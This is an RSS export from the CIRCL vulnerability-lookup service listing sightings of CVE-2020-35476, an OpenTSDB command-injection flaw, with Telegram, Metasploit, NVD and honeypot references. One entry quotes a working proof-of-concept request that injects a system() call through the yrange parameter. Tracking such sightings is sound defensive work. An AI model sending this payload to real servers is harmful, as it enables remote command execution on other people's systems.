https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Sat, 06 Jun 2026 06:47:13 +0000 https://vulnerability.circl.lu/sighting/57b6d1d5-adb7-4415-a64d-4e66b0e0cba3/export {"uuid": "57b6d1d5-adb7-4415-a64d-4e66b0e0cba3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "published-proof-of-concept", "source": "https://t.me/pwnwiki_zhchannel/267", "content": "CVE-2020-35476 OpenTSDB 2.4.0 \u9060\u7a0b\u4ee3\u78bc\u57f7\u884c\u6f0f\u6d1e\nhttps://www.pwnwiki.org/index.php?title=CVE-2020-35476_OpenTSDB_2.4.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E", "creation_timestamp": "2021-04-27T09:04:52.000000Z"} {"uuid": "57b6d1d5-adb7-4415-a64d-4e66b0e0cba3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "published-proof-of-concept", "source": "https://t.me/pwnwiki_zhchannel/267", "content": "CVE-2020-35476 OpenTSDB 2.4.0 \u9060\u7a0b\u4ee3\u78bc\u57f7\u884c\u6f0f\u6d1e\nhttps://www.pwnwiki.org/index.php?title=CVE-2020-35476_OpenTSDB_2.4.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E", "creation_timestamp": "2021-04-27T09:04:52.000000Z"} https://vulnerability.circl.lu/sighting/57b6d1d5-adb7-4415-a64d-4e66b0e0cba3/export Tue, 27 Apr 2021 09:04:52 +0000 https://vulnerability.circl.lu/sighting/c5c9b345-596b-4fa1-96db-8e32da44b1ef/export {"uuid": "c5c9b345-596b-4fa1-96db-8e32da44b1ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35473", "type": "seen", "source": "https://t.me/cibsecurity/52620", "content": "\u203c CVE-2020-35473 \u203c\n\nAn information leakage vulnerability in the Bluetooth Low Energy advertisement scan response in Bluetooth Core Specifications 4.0 through 5.2, and extended scan response in Bluetooth Core Specifications 5.0 through 5.2, may be used to identify devices using Resolvable Private Addressing (RPA) by their response or non-response to specific scan requests from remote addresses. RPAs that have been associated with a specific remote device may also be used to identify a peer in the same manner by using its reaction to an active scan request. This has also been called an allowlist-based side channel.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-11-08T12:35:00.000000Z"} {"uuid": "c5c9b345-596b-4fa1-96db-8e32da44b1ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35473", "type": "seen", "source": "https://t.me/cibsecurity/52620", "content": "\u203c CVE-2020-35473 \u203c\n\nAn information leakage vulnerability in the Bluetooth Low Energy advertisement scan response in Bluetooth Core Specifications 4.0 through 5.2, and extended scan response in Bluetooth Core Specifications 5.0 through 5.2, may be used to identify devices using Resolvable Private Addressing (RPA) by their response or non-response to specific scan requests from remote addresses. RPAs that have been associated with a specific remote device may also be used to identify a peer in the same manner by using its reaction to an active scan request. This has also been called an allowlist-based side channel.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-11-08T12:35:00.000000Z"} https://vulnerability.circl.lu/sighting/c5c9b345-596b-4fa1-96db-8e32da44b1ef/export Tue, 08 Nov 2022 12:35:00 +0000 https://vulnerability.circl.lu/sighting/5eaa516e-771c-4fa8-a672-115930e60b95/export {"uuid": "5eaa516e-771c-4fa8-a672-115930e60b95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb", "content": "", "creation_timestamp": "2022-12-23T14:46:09.000000Z"} {"uuid": "5eaa516e-771c-4fa8-a672-115930e60b95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb", "content": "", "creation_timestamp": "2022-12-23T14:46:09.000000Z"} https://vulnerability.circl.lu/sighting/5eaa516e-771c-4fa8-a672-115930e60b95/export Fri, 23 Dec 2022 14:46:09 +0000 https://vulnerability.circl.lu/sighting/2e8976d7-816d-4eaf-b2af-1238bc51d174/export {"uuid": "2e8976d7-816d-4eaf-b2af-1238bc51d174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "seen", "source": "https://t.me/cibsecurity/63240", "content": "\u203c CVE-2023-25826 \u203c\n\nDue to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was previously disclosed as CVE-2020-35476. Regex validation that was implemented to restrict allowed input to the query API does not work as intended, allowing crafted commands to bypass validation.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-05-03T22:31:09.000000Z"} {"uuid": "2e8976d7-816d-4eaf-b2af-1238bc51d174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "seen", "source": "https://t.me/cibsecurity/63240", "content": "\u203c CVE-2023-25826 \u203c\n\nDue to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was previously disclosed as CVE-2020-35476. Regex validation that was implemented to restrict allowed input to the query API does not work as intended, allowing crafted commands to bypass validation.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-05-03T22:31:09.000000Z"} https://vulnerability.circl.lu/sighting/2e8976d7-816d-4eaf-b2af-1238bc51d174/export Wed, 03 May 2023 22:31:09 +0000 https://vulnerability.circl.lu/sighting/8664cdb7-2538-4f5a-900a-aa7f2db14a44/export {"uuid": "8664cdb7-2538-4f5a-900a-aa7f2db14a44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/995", "content": "CVE-2020-35476 \n\nget\n /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27cat /etc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json\"\n\n#poc", "creation_timestamp": "2023-11-03T05:29:56.000000Z"} {"uuid": "8664cdb7-2538-4f5a-900a-aa7f2db14a44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/995", "content": "CVE-2020-35476 \n\nget\n /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27cat /etc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json\"\n\n#poc", "creation_timestamp": "2023-11-03T05:29:56.000000Z"} https://vulnerability.circl.lu/sighting/8664cdb7-2538-4f5a-900a-aa7f2db14a44/export Fri, 03 Nov 2023 05:29:56 +0000 https://vulnerability.circl.lu/sighting/722eeeb2-4f34-4f91-bc85-ffbb728894a0/export {"uuid": "722eeeb2-4f34-4f91-bc85-ffbb728894a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/2611", "content": "#exploit\nCVE-2020-35476:\nOpenTSDB (Scalable Time Series DB) 2.4.0 - RCE\nhttps://github.com/OpenTSDB/opentsdb/issues/2051", "creation_timestamp": "2024-10-09T19:25:13.000000Z"} {"uuid": "722eeeb2-4f34-4f91-bc85-ffbb728894a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/2611", "content": "#exploit\nCVE-2020-35476:\nOpenTSDB (Scalable Time Series DB) 2.4.0 - RCE\nhttps://github.com/OpenTSDB/opentsdb/issues/2051", "creation_timestamp": "2024-10-09T19:25:13.000000Z"} https://vulnerability.circl.lu/sighting/722eeeb2-4f34-4f91-bc85-ffbb728894a0/export Wed, 09 Oct 2024 19:25:13 +0000 https://vulnerability.circl.lu/sighting/332dea69-c4cf-4308-9707-7583555b1cfd/export {"uuid": "332dea69-c4cf-4308-9707-7583555b1cfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"} {"uuid": "332dea69-c4cf-4308-9707-7583555b1cfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"} https://vulnerability.circl.lu/sighting/332dea69-c4cf-4308-9707-7583555b1cfd/export Thu, 06 Feb 2025 03:13:44 +0000 https://vulnerability.circl.lu/sighting/83d95242-4109-4304-9e61-e1067d98d8a7/export {"uuid": "83d95242-4109-4304-9e61-e1067d98d8a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:28.000000Z"} {"uuid": "83d95242-4109-4304-9e61-e1067d98d8a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:28.000000Z"} https://vulnerability.circl.lu/sighting/83d95242-4109-4304-9e61-e1067d98d8a7/export Sun, 23 Feb 2025 04:10:28 +0000 https://vulnerability.circl.lu/sighting/66a7712b-b461-42fa-a109-c5dfbcf85a11/export {"uuid": "66a7712b-b461-42fa-a109-c5dfbcf85a11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-18)", "content": "", "creation_timestamp": "2025-05-18T00:00:00.000000Z"} {"uuid": "66a7712b-b461-42fa-a109-c5dfbcf85a11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-18)", "content": "", "creation_timestamp": "2025-05-18T00:00:00.000000Z"} https://vulnerability.circl.lu/sighting/66a7712b-b461-42fa-a109-c5dfbcf85a11/export Sun, 18 May 2025 00:00:00 +0000 https://vulnerability.circl.lu/sighting/d5680ea5-f87b-45ef-9b0b-cfb897cd43a2/export {"uuid": "d5680ea5-f87b-45ef-9b0b-cfb897cd43a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-08)", "content": "", "creation_timestamp": "2026-02-08T00:00:00.000000Z"} {"uuid": "d5680ea5-f87b-45ef-9b0b-cfb897cd43a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-35476", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-08)", "content": "", "creation_timestamp": "2026-02-08T00:00:00.000000Z"} https://vulnerability.circl.lu/sighting/d5680ea5-f87b-45ef-9b0b-cfb897cd43a2/export Sun, 08 Feb 2026 00:00:00 +0000